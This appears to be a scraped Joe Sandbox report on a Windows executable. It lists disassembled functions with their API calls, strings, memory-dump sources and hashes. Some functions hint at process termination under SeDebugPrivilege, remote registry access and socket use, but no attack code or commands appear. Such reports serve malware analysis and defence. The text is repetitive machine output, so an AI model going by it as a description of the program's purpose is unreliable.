Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: b06150280bdbc75c5702942de1efa699f79b55ecfc3b0d720a875ad88246abc0
Instruction ID: 56ea5995d8801977bbc21d05c0bdf54845c8bf0f6932d700e3c5c4f1a2334dcb
Opcode Fuzzy Hash: b06150280bdbc75c5702942de1efa699f79b55ecfc3b0d720a875ad88246abc0
Instruction Fuzzy Hash: 515123B2A092295ADF54EB94E941DDE73BCAF0C311F0044AAFA05E3541EA7497C9CB60

Function 00A2EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00A8DAD1,00000004,00000000,00000000), ref: 00A2EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00A8DAD1,00000004,00000000,00000000), ref: 00A2EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00A8DAD1,00000004,00000000,00000000), ref: 00A8DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00A8DAD1,00000004,00000000,00000000), ref: 00A8DCF2

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: c6bdda8218e9aecc08dfb1ba88d426a9015199514e7afbcd3656bdcb8a9805c0
Instruction ID: c7d54a7cf8f5aed37eba63068b56e79a3c796fe8f8128012015902ba945371fe
Opcode Fuzzy Hash: c6bdda8218e9aecc08dfb1ba88d426a9015199514e7afbcd3656bdcb8a9805c0
Instruction Fuzzy Hash: 1A41F670715290AAD739DB3CED8DB7A7BA6FB41305F19C42EE147869A1CA70B8C1C311

Function 00A4B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00A4AEF1,00000B00,?,?), ref: 00A4B26C
HeapAlloc.KERNEL32(00000000,?,00A4AEF1,00000B00,?,?), ref: 00A4B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A4AEF1,00000B00,?,?), ref: 00A4B288
GetCurrentProcess.KERNEL32(?,00000000,?,00A4AEF1,00000B00,?,?), ref: 00A4B290
DuplicateHandle.KERNEL32(00000000,?,00A4AEF1,00000B00,?,?), ref: 00A4B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00A4AEF1,00000B00,?,?), ref: 00A4B2A3
GetCurrentProcess.KERNEL32(00A4AEF1,00000000,?,00A4AEF1,00000B00,?,?), ref: 00A4B2AB
DuplicateHandle.KERNEL32(00000000,?,00A4AEF1,00000B00,?,?), ref: 00A4B2AE
CreateThread.KERNEL32(00000000,00000000,00A4B2D4,00000000,00000000,00000000), ref: 00A4B2C8

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 778330af0dba0376577dfe24db5b7812fb61cc45559009655a35cd91c645626a
Instruction ID: 719660a07938c28a13990ece2254cc89240d507b6a3aeeef68b4b4b3f3490114
Opcode Fuzzy Hash: 778330af0dba0376577dfe24db5b7812fb61cc45559009655a35cd91c645626a
Instruction Fuzzy Hash: FA01BBB6340304BFEB10EBA5DC49F6B7BACEB88711F418412FA05DB1A1CE749841CB61

Function 00A6C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00A6C49E
NULL Pointer assignment, xrefs: 00A6C876, 00A6C887

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: ded67e3631a7e71c61bc9e4aad05441a14c255da59094880e455f91cedc26438
Instruction ID: 109636f966771b40925119d37ddc11b3ba71f29bb6976412602ae7f95ce6f941
Opcode Fuzzy Hash: ded67e3631a7e71c61bc9e4aad05441a14c255da59094880e455f91cedc26438
Instruction Fuzzy Hash: 70E1B271A00219AFDF14DFA8C985BBE77B5FF48724F148029F985AB281D770AD45CB90

Function 00A6BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A6BB5C
VariantInit.OLEAUT32(?), ref: 00A6BC2D
VariantInit.OLEAUT32(?), ref: 00A6BD2E
VariantClear.OLEAUT32(?), ref: 00A6BD38
VariantClear.OLEAUT32(?), ref: 00A6BD99

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00A6BD11
Null Object assignment in FOR..IN loop, xrefs: 00A6BBBD, 00A6BCEB, 00A6BDA7

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 6d791ec51dfaa8720d7aeb15c1ba22ecf65b61ba4b0427d1b26abaeb8237fa10
Instruction ID: c3d1b830520a1ee84093b24983a8d0242bc3d8ca684afe30f1839e01b0b05e92
Opcode Fuzzy Hash: 6d791ec51dfaa8720d7aeb15c1ba22ecf65b61ba4b0427d1b26abaeb8237fa10
Instruction Fuzzy Hash: 3891A171A10219EBDF24DF95C844FAEBBB8EF85710F108559F515EB280DB709A85CFA0

Function 00A79A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A79B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 00A79B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A79B47
_wcscat.LIBCMT ref: 00A79BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00A79BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A79BE7

Strings

SysListView32, xrefs: 00A79AEB

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: d52bd74ac777eb282cfe2edf1809aa19b7725b702551be5a62e9200db3f3ee5f
Instruction ID: 8b939a7185d5e809bbf1b9211332b45bd33ef53a9d36445a3d2b01ed9b4fd599
Opcode Fuzzy Hash: d52bd74ac777eb282cfe2edf1809aa19b7725b702551be5a62e9200db3f3ee5f
Instruction Fuzzy Hash: 68418D71A00308ABEF21DFA4DC85FEA77A9EF48350F10892AF549A7291D7719D85CB60

Function 00A7172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00A56532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00A56554
Part of subcall function 00A56532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00A56564
Part of subcall function 00A56532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00A565F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A7179A
GetLastError.KERNEL32 ref: 00A717AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A717D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00A71855
GetLastError.KERNEL32(00000000), ref: 00A71860
CloseHandle.KERNEL32(00000000), ref: 00A71895

Strings

SeDebugPrivilege, xrefs: 00A717B8

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: a7f9683ecd7e814982781bc6b4d234a91e56c76e4b96fe288488099407507af2
Instruction ID: 9522d5698f216d864037882a7c8d75cb55fa5a16b241ed90b1f3c9eb25697041
Opcode Fuzzy Hash: a7f9683ecd7e814982781bc6b4d234a91e56c76e4b96fe288488099407507af2
Instruction Fuzzy Hash: 2C41AC72700200AFDB05EF98CEE5FAEB7E5AF44311F04C059F90A9F282DB74A9458B91

Function 00A55819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00A558B8

Strings

blank, xrefs: 00A5583A
question, xrefs: 00A55871
info, xrefs: 00A55859
warning, xrefs: 00A558A1
stop, xrefs: 00A55889

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 2b8f28c267c6192939869e97b74f24979468ba3d8be87b61a5c1923bb00acb95
Instruction ID: 849dbb5feb10a55b75dda1a15a8724f9a2c2afee262d644c79cab69de35ff01e
Opcode Fuzzy Hash: 2b8f28c267c6192939869e97b74f24979468ba3d8be87b61a5c1923bb00acb95
Instruction Fuzzy Hash: 40112072B0DB42BEEB055B749CA2DAB73ECBF15324F20003EFD51E6281E770AA445664

Function 00A5A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00A5A806

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: e59065971d380520750811ecd94e84d5a0c0b683ebfc080cb47df91c035ee7b9
Instruction ID: 60b89444afa06ca041e17fe8d4c116a3c68a5e193a3a18df5d24368baee95c27
Opcode Fuzzy Hash: e59065971d380520750811ecd94e84d5a0c0b683ebfc080cb47df91c035ee7b9
Instruction Fuzzy Hash: 0FC1A075B0421ADFDB04DF98D581BAEB7F4FF18312F20416AEA05E7241D734A949CB91

Function 00A56B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A56B63
LoadStringW.USER32(00000000), ref: 00A56B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A56B80
LoadStringW.USER32(00000000), ref: 00A56B87
_wprintf.LIBCMT ref: 00A56BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A56BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00A56BA8

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: dc32c1eeefc834ed0fba0bec23b26efe817eb63e3a6bc07bbdc9b000fb468473
Instruction ID: f8d9c42d77039bd69e5eebdaec3ab92e0712b9d61b8fa5c6a8d3711bfb9f2636
Opcode Fuzzy Hash: dc32c1eeefc834ed0fba0bec23b26efe817eb63e3a6bc07bbdc9b000fb468473
Instruction Fuzzy Hash: 36016DF2A00208BFEB11EBE49D89EE6336CE708304F4044A2B746E6041EA749E858B70

Function 00A72B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A73C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A72BB5,?,?), ref: 00A73C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A72BF6

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: c9108a6ac7eb07dab77df6e0ca17a49a8d4eeb1561b021ced969691231d0679f
Instruction ID: b63bafda6c1c43545c97358a8234f26b12d4206cca2d9e16301f26eb4e0f9b20
Opcode Fuzzy Hash: c9108a6ac7eb07dab77df6e0ca17a49a8d4eeb1561b021ced969691231d0679f
Instruction Fuzzy Hash: 21916971604201AFCB11EF54C991B6EB7E5FF88310F14C81DF99A9B2A2DB34E945CB42

Function 00A695BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00A69691
WSAGetLastError.WSOCK32(00000000), ref: 00A6969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00A696C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A696E9
WSAGetLastError.WSOCK32(00000000), ref: 00A696F8
htons.WSOCK32(?,?,?,00000000,?), ref: 00A697AA
inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00AADC00), ref: 00A69765

Part of subcall function 00A4D2FF: _strlen.LIBCMT ref: 00A4D309

_strlen.LIBCMT ref: 00A69800

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: d690e8174712043d75af2e304ec270d1e8166062627707083b8ff810d0eaa3ad
Instruction ID: 45def374b7892130a79162241b4990505d013d10bf033534fafe5f9e2ccd379c
Opcode Fuzzy Hash: d690e8174712043d75af2e304ec270d1e8166062627707083b8ff810d0eaa3ad
Instruction Fuzzy Hash: 0081AD71508200ABC710EFA8DE85EABB7F8EF89714F104A2DF5559B291EB30DD45CB92

Function 00A3A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 00A3A991

Part of subcall function 00A37D7C: __FF_MSGBANNER.LIBCMT ref: 00A37D91
Part of subcall function 00A37D7C: __NMSG_WRITE.LIBCMT ref: 00A37D98
Part of subcall function 00A37D7C: __malloc_crt.LIBCMT ref: 00A37DB8

__lock.LIBCMT ref: 00A3A9A4
__lock.LIBCMT ref: 00A3A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00AC6DE0,00000018,00A45E7B,?,00000000,00000109), ref: 00A3AA0C
EnterCriticalSection.KERNEL32(8000000C,00AC6DE0,00000018,00A45E7B,?,00000000,00000109), ref: 00A3AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 00A3AA39

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 7a891d461213f4ca7f79762bbcb322d96843cdd8c6ffa16f26ca527c4c9315c2
Instruction ID: 16da17b54349093d35ae6854965918a936a5aa3a99902f1614fff2e0425b9464
Opcode Fuzzy Hash: 7a891d461213f4ca7f79762bbcb322d96843cdd8c6ffa16f26ca527c4c9315c2
Instruction Fuzzy Hash: 5D414B72E016259BEB10DFA8CA4479CB7B0AF11375F10831AF4A5AB2D1DB749841CB95

Function 00A78ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A78EE4
GetDC.USER32(00000000), ref: 00A78EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A78EF7
ReleaseDC.USER32(00000000,00000000), ref: 00A78F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00A78F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A78F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A7BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00A78F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A78FAA

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 27012c672e4a06a1ae39904a6bee772b07ff2555536e46439a1e93e892283ee0
Instruction ID: 5b8282ca415386f618e6f7746568b8b4d8295c451b6601f3b380005fe523a727
Opcode Fuzzy Hash: 27012c672e4a06a1ae39904a6bee772b07ff2555536e46439a1e93e892283ee0
Instruction Fuzzy Hash: B1317F72240214BFEB108FA0CC4AFEA3FAEEF49715F048065FE09DA191CA759842CB74

Function 00A616DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 00A1936C: __swprintf.LIBCMT ref: 00A193AB
Part of subcall function 00A1936C: __itow.LIBCMT ref: 00A193DF

Part of subcall function 00A2C6F4: _wcscpy.LIBCMT ref: 00A2C717

_wcstok.LIBCMT ref: 00A6184E
_wcscpy.LIBCMT ref: 00A618DD
_memset.LIBCMT ref: 00A61910

Strings

X, xrefs: 00A61948

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: f35416c6a3cd2c7d26d2dbbcb320746000683acdbdd46c6e80c4302b08a32a59
Instruction ID: a166b12fdab0ddc9e8d35b5b494d702c9a025ba2219198fafa07407fa1b667b1
Opcode Fuzzy Hash: f35416c6a3cd2c7d26d2dbbcb320746000683acdbdd46c6e80c4302b08a32a59
Instruction Fuzzy Hash: 4CC16F315083509FC724EF64CA91A9ABBF4FF95350F04492DF89A972A2DB30ED45CB82

Function 00A80133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A2B35F

GetSystemMetrics.USER32(0000000F), ref: 00A8016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00A8038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A803AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 00A803D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A803FF
ShowWindow.USER32(00000003,00000000), ref: 00A80421
DefDlgProcW.USER32(?,00000005,?,?), ref: 00A80440

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: a27b61011b99f7d0b6861cfc6be15245d35361d78f6b34ce0358bda90ca1d89a
Instruction ID: d70dce1402121105475222436b0f4581205b35ffe1dd763d9f77d895183a88c6
Opcode Fuzzy Hash: a27b61011b99f7d0b6861cfc6be15245d35361d78f6b34ce0358bda90ca1d89a
Instruction Fuzzy Hash: 41A1CD35600616EFDB18DF68C989BBEBBB1FF08700F048115ED54AB290EB74AD65CB90

Function 00A2AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
